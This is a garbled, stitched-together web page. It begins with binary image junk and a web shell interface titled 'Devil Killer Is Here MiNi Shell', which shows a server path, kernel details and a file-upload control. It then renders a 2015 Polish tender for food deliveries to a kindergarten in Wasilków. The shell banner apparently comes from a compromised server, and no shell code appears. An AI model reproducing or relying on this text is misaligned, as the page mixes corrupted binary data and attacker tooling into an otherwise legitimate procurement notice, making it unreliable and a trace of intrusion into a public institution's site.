JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150507/105904-N-2015.html

<p class="kh_header"><b>Wasilków: Sukcesywna dostawa artykułów żywnościowych dla Przedszkola Słonecznego w Wasilkowie</b><br>
<b>Numer ogłoszenia: 105904 - 2015; data zamieszczenia: 07.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole  "Słoneczne" w Wasilkowie , ul. Sienkiewicza 24, 16-010 Wasilków, woj. podlaskie, tel. (085) 7185501, faks (085) 7185501.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.przedszkole.wasilkow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów żywnościowych dla Przedszkola Słonecznego w Wasilkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sukcesywna dostawa artykułów żywnościowych  wymienionych  w załącznikach , w których wskazano asortyment i przewidywaną ilość odpowiednio dla części wskazanych w pkt.2.  
2. Zamówienie będzie dokonane i realizowane w podziale na 7 części:

Część 1. Warzywa i owoce  świeże i suszone  
Część 2. Jaja kurze
Część 3. Mięso i wędliny
Część 4. Produkty ogólnospożywcze
Część 5. Produkty mleczarskie
Część 6. Mrożonki i ryby
Część 7. Pieczywo

3. Szczegóły i warunki realizacji zamówienia wspólne dla wszystkich części :
1) Przedmiotem zamówienia objęty jest także załadunek, transport i rozładunek dostarczanych artykułów do pomieszczeń wskazanych przez Zamawiającego, znajdujących się w jego siedzibie w Wasilkowie przy  ul. Sienkiewicza 24 i filii przy ul. Polnej 1/4c.  
   2)  Podane w załącznikach wskazanych w ust.1 ilości produktów w poszczególnych częściach są szacunkowe i mogą ulec  zmniejszeniu.  Zmniejszenie ilości dostarczanych artykułów żywnościowych może wynikać z uzasadnionych potrzeb  Zamawiającego np. zmniejszenia liczby żywionych wychowanków przedszkola w wyniku absencji i nie może stanowić podstaw do zgłaszania roszczeń z tytułu niezrealizowanych dostaw albo podstawy do odmowy realizacji dostaw. Zamawiający nie będzie ponosił ujemnych skutków finansowych spowodowanych zmniejszeniem ilości   i wartości dostaw.
      Zamawiający zastrzega sobie również prawo zmian ilościowych dostaw pomiędzy pozycjami w ramach danej części zamówienia.
   3) Rozliczenie finansowe Wykonawcy z Zamawiającym odbywać się będzie na podstawie ilości   i rodzaju faktycznie dostarczonych do Zamawiającego produktów spożywczych i ich cen jednostkowych podanych przez Wykonawcę w formularzu asortymentowo-cenowym odpowiednio dla części zamówienia.  
   4) Oferowane artykuły żywnościowe winny spełniać wymagania wymienione w obowiązujących przepisach prawa dotyczącego produkcji i obrotu żywności, a w szczególności: Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr 136, poz. 914, z późn. zm.), wraz z przepisami wykonawczymi oraz Ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (Dz. U. z 2005 r. Nr 187, poz. 1577, z późn. zm.). Każdy produkt winny być wyprodukowany i wprowadzony do obrotu zgodnie z normami systemu HACCP.
5) Dostawa artykułów żywnościowych ma być wykonywana środkami transportu spełniającymi wymogi sanitarne, zgodnie z Ustawą z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr 136, poz. 914, z późn. zm.) Osoby wykonujące dostawę muszą legitymować się aktualnym zaświadczeniem lekarskim do celów sanitarno-epidemiologicznych, które okazują na każde żądanie Zamawiającego.
4.  Pozostałe wymagania:
1) Dostarczane w każdej z części produkty spełniać muszą prawem określone wymogi dla tych produktów w tym wymogi zdrowotne. Materiał opakowaniowy winny być dopuszczony do kontaktu z żywnością. Każdy asortyment produktów musi być dostarczony w oddzielnym pojemniku. Produkty w puszkach winny być wyposażone    w elementy do otwierania ręcznego, bez pomocy otwieracza mechanicznego. Jakość dostarczanych produktów winna być zgodna z obowiązującymi przepisami oraz atestami dla produktów pierwszego gatunku / klasy. Produkty oznakowane mają być zgodnie z wymaganiami rozporządzenia w sprawie oznakowania środków spożywczych (Dz. U. z 2007 r. Nr 137, poz. 966), tzn. muszą zawierać: nazwę, wykaz i ilość składników lub kategorii składników, zawartość netto w opakowaniu, datę minimalnej trwałości lub termin przydatności do spożycia, warunki przechowywania, firmę i adres producenta lub przedsiębiorcy paczkującego środek spożywczy, nazwę                 i adres producenta. 
 2) Przy każdej dostawie jaj konsumpcyjnych oraz mięsa i wędlin zamawiający wymaga przedstawienia handlowego dokumentu identyfikacyjnego (HDI) zgodnie z ustawą o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r. Nr 17, poz. 127) oraz rozporządzeniem WE 853/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 r., ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz. Urz. UE L139 z dnia 30 kwietnia 2004 r.),
a) Jaja konsumpcyjne muszą być oznakowane weterynaryjnym numerem zakładu oraz zdezynfekowane za pomocą promienia ultrafioletowego. 
b) Wykonawca, na każde żądanie zamawiającego, zobowiązany jest przedstawić stosowne zaświadczenie właściwego lekarza weterynarii poświadczające badanie dostarczanego mięsa.
3) Dostarczane produkty będą świeże, pełnowartościowe, należytej jakości, zgodnie z opisanymi wyżej wymaganiami, oraz będą dostarczane nie później, niż w połowie okresu przydatności do spożycia przewidzianego  dla danego produktu, z zastrzeżeniem, iż: pieczywo   wyprodukowane będzie w dobie dostawy; ryby i mrożonki będą posiadać termin przydatności do spożycia nie krótszy niż 30 dni od dostawy; jaja konsumpcyjne nie będą starsze niż 7 dni od daty pakowania; warzywa i owoce świeże cechować się będą regularnym kształtem właściwym dla danej odmiany, będą wolne od szkodników, zanieczyszczeń ziemią, uszkodzeń, oznak wyrastania korzenia w pęd nasienny, brakiem oznak więdnięcia, wyschnięcia czy gnicia; mięso i wędliny będą produktami świeżymi, z terminem przydatności do spożycia nie krótszym niż 5 dni od dostawy. 
5. Dostawy realizowane będą na podstawie bieżących zamówień składanych przez uprawnionego pracownika Zamawiającego /telefonicznie, pisemnie lub elektronicznie/, wykonywanych z minimum jednodniowym wyprzedzeniem  (składanych do godziny 15:00), od poniedziałku do piątku z  następującą częstotliwością dostaw:	
- owoce i warzywa, jaja, mięso i wędliny oraz artykuły mleczarskie i ogólnospożywcze - dwa razy w tygodniu  do godziny 8.00 (harmonogram szczegółowy dostaw, tj. dni tygodnia, w których winny odbywać się dostawy, zostanie wskazany przez Zamawiającego przed podpisaniem umowy)  
- pieczywo (codziennie do 6 rano)	
- ryby i mrożonki (2 razy w miesiącu)	
W przypadku warzyw i owoców zamawiający przewiduje możliwość zwiększenia częstotliwości dostaw średnio o raz w tygodniu.  
6. W przypadku gdy Zamawiający określił przedmiot zamówienia wskazując producenta, znaki towarowe    i pochodzenie, Zamawiający dopuszcza zaoferowanie produktów równoważnych zgodnie z zasadami określonymi w art. 30 ust. 5 ustawy Prawo zamówień publicznych. W takim przypadku Wykonawca zobowiązany jest wykazać, iż oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego. Oferta winna zawierać wszystkie informacje umożliwiające identyfikację spełnienia wskazanych wymagań (parametrów) dla danego produktu (gramatura, zawartość procentowa poszczególnych składników, wydajność z opakowania, wartość odżywcza itp.).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1) każdy Wykonawca zobowiązany jest złożyć oddzielnie dokumenty określone w Sekcji III.4.2) tiret 2, oraz w Sekcji III.4.4),
2) oświadczenie o spełnieniu warunków udziału w postępowaniu określone w Sekcji III.4.1)   oraz oświadczenie o nie podleganiu wykluczeniu określone w Sekcji III.4.2) tiret 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy  z wykonawców oddzielnie.
2. Dokumenty podmiotów zagranicznych:
1)jeżeli w kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III.4.3.1) tiret  1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem,
2) dokument, o którym mowa w Sekcji III.4.3.1) tiret 1 lub zastępujący go dokument, o którym mowa w pkt1), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3)w przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole.wasilkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Słoneczne w Wasilkowie, ul. Sienkiewicza 24; 16-010 Wasilków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2015 godzina 16:15, miejsce: Przedszkole Słoneczne w Wasilkowie, ul. Sienkiewicza 24; 16-010 Wasilków (pokój intendenta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Warzywa i owoce świeże i suszone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Jm	Ilość szacunkowa
1	2	3	4
1	BANANY klasa I lub II wg Rozporządzenia Komisji WE nr 2257/94 odmiana CONSUL, TURBAN, MONITA, CHIQUITTA	kg	200
2	BANANY SUSZONE w plasterkach, nie połamane	kg	30
3	CYTRYNA, klasa I, średnia wielkość, bez pestek, twarda, gładka skórka	kg	30
4	GRUSZKI, krajowe, średniej wielkości, średnio twarde, o podobnej wielkości	kg	150
5	JABŁKA, typu cortland, ligol, champion, delikates, rubin, jonagared, klasa I, średnia wielkość, bez korka, średnio twarde, bez uszkodzeń,	kg	2800
6	KIWI klasa I, wielkość średnia, pół twarde, sztuka	szt	400
7	KIWI klasa I, wielkość średnia, pół twarde	kg	30
8	MANDARYNKA, klasa I, bezpestkowa, o średnicy ok 6 cm, słodkie, soczyste, gładka skórka	kg	21
9	POMARAŃCZE typu nowelina, klasa I, cienka skórka, bez pestek	kg	150
10	TRUSKAWKI, krajowe, klasa I, odmiana konsumpcyjna, w całości wybarwiona, słodka, jednakowej wielkości, dostawa w łubiankach	kg	280
11	ŚLIWKI DESEROWE typu węgierka/prezydent, klasa I, dojrzałość konsumpcyjna, odchodzące od pestek, krajowe, jednakowej wielkości, słodkie, soczyste	kg	30
12	WINOGRONA JASNE/CIEMNE, klasa I, kiście, bez pestek, cienka skórka, słodkie,	kg	40
13	BURAKI CZERWONE, klasa I, konsumpcyjne, bez liści, wielkość średnia, okrągłe, bez uszkodzeń, bez botwiny	kg	450
14	CZOSNEK, klasa I, krajowy, duże główki,	szt	65
15	CEBULA BIAŁA, klasa I, wielkość średnia, bez szczypioru, okrągła, luz	kg	170
16	CEBULA CZERWONA, wielkość średnia, bez szczypioru, okrągła, luz	kg	30
17	KOPEREK (natka), klasa I, pęczek, wielość sezonowa, niezwiędnięty	szt	250
18	KAPUSTA BIAŁA, główka 2000-3000g, świeża, bez suchych liści, twarda	kg	400
19	KAPUSTA CZERWONA, klasa I, główka 2000-2500 g, świeża, bez suchych liści, twarda,	kg	150
20	KAPUSTA KISZONA BIAŁA, nie przekwaszona, z dodatkiem marchewki, opakowanie wiaderko plastikowe 5000g	kg	90
21	KAPUSTA PEKIŃSKA (foliowana), klasa I, bez zgniłych liści, duża główka, niezwiędnięta	kg	450
22	MARCHEWKA KAROTKA, klasa I, wielkość średnia, bez naci, słodka, jędrna, myta, luz	kg	530
23	OGÓREK ZIELONY SZKLARNIOWY klasa I, długi, twardy, niefarbowane, bez uszkodzeń lub w sezonie, luz OGÓREK GRUNTOWY klasa I, oczyszczony, średniej wielkości, jasnozielony, pachnący świeżością, niezwiędnięty, niegorzkie, nieprzerośnięty, luz	kg	60
24	OGÓREK KISZONY w naturalnym kwasie z koprem i solą, nieprzekwaszony, średniej wielkości, niegorzkie (wiaderko, pojemność 3000-6000 g)	kg	150
25	POMIDORY CZERWONE klasa I, malinowe, na gałązkach, gargamele, duże, całe wybarwione, pachnące, średnio twarde, luz	kg	140
26	PAPRYKA CZERWONA twarda, słodka, soczysta, duża	kg	60
27	PIETRUSZKA klasa I, korzeń, twarda, duża, aromatyczna, jędrna, myta, luz	kg	120
28	PIECZARKI białe, twarde, duże, świeże	kg	170
29	POR klasa I, niezgniły, duży, jasnozielony, twardy, oczyszczony	szt	56
30	PIETRUSZKA ZIELONA, klasa I, duży pęczek, pachnąca, jędrna, klasa I, krajowy	szt	170
31	RZODKIEWKA klasa I, okrągła, pęczek 180-250 g, czerwona, chrupiąca, jędrna, oczyszczona, ostry smak	szt	280
32	SZCZYPIOREK ŚWIEŻY, klasa I, pęczek gruby, krajowy, wielkość sezonowa,	szt	336
33	SAŁATA ZIELONA/MASŁOWA/KARBOWANA, klasa I, wielkość sezonowa, duża główka, oczyszczona, bez zgniłych liści, biały korzeń	szt	420
34	SAŁATA LODOWA (pakowana każda główka osobno), klasa I, waga min 350g, biały korzeń, oczyszczona, bez zgniłych liści	szt	280
35	SELER KORZENIOWY klasa I, twardy, średniej wielkości, aromatyczny, oczyszczony	kg	120
36	ZIEMNIAKI klasa I, typu Irga, konsumpcyjne, umyte, skórka bez zielonych zabarwień, twarde, bez kiełkujących oczek, wielkość średnia, niezgniłe, pakowane w worki 25 kg,  	kg	6000
37	ŻURAWINA SUSZONA, duża, błyszcząca, słodka, z cukrem trzcinowym, cała, o dużej zawartości owoców min 60%	kg	28
38	RODZYNKI sułtańskie, duże, całe, błyszczące, słodkie, z cukrem trzcinowym, o zawartości owoców min 60%	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.22.00.00-9, 03.22.10.00-6, 03.22.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Jaja kurze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Jm	Ilość szacunkowa
1	2	3	4
1	JAJA KONSUMPCYJNE KURZE, klasy A, pierwszej grupy jakościowej (1), określane w kategorii wagowej jako duże - L, waga ok 75 g	szt	6800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.14.25.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Opis produktu	Jm	Ilość szacunkowa
1	2	3	4
1	KURCZAK FILET Z PIERSI, świeże, nie rozmrażane, bez skóry, bez chrząstki, podwójne, waga ok 500g	kg	580
2	INDYK FILET Z PIERSI, świeży, nie rozmrażany, bez skóry, bez kości, bez chrząstki, waga ok 1000g	kg	240
3	KABANOSY WIEPRZOWE, zamknięte próżniowo, zawartość mięsa min 156g w 100g produktu, towar dostarczony z termin ważności przydatności do spożycia nie krótszy niż 30 dni od dostawy	kg	84
4	ŁOPATKA WIEPRZOWA, mięsień, świeża, nie rozmrażana, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu	kg	680
5	PARÓWKI Z SZYNKI, min 93% mięsa wieprzowego,  towar dostarczony z terminem ważności przydatności do spożycia nie krótszy niż 30 dni od dostawy	kg	154
6	PASZTET PIECZONY z mięsa wieprzowo-cielęcego, pierwszej klasy, wędzony, typ wiejski, bez konserwantów	kg	50
7	POLĘDWICA SOPOCKA, zawartość mięsa min 71%	kg	52
8	SCHAB WIEPRZOWY, środkowy, świeży, bez kości, nie rozmrażany, słonina zdjęta	kg	230
9	SZYNKA GOTOWANA WIEPRZOWA, zawartość mięsa min 80%	kg	54
10	SZYNKA DROBIOWA z piersi kurcząt, zawartość mięsa 88-90%	kg	14
11	POLĘDWICA MIODOWA DROBIOWA, zawartość mięsa min 70%	kg	14
12	KIEŁBASA SUCHA zawartość 108 g  mięsa wieprzowego w 100g produktu	kg	54
13	KIEŁBASA BIAŁA SUROWA, zawartość mięsa min 75% mięsa wieprzowego	kg	140
14	KIEŁBASA ŻYWIECKA, średnio rozdrobniona, zawartość 119g mięsa wieprzowego w 100g produktu	kg	50
15	KIEŁBASA CIENKA, typu podwawelska/toruńska, zawartość mięsa 84% wieprzowego	kg	140
16	MORTADELA, zawartość mięsa min 42% wieprzowego	kg	14.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.00.00-2, 15.13.11.30-5, 15.13.13.10-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
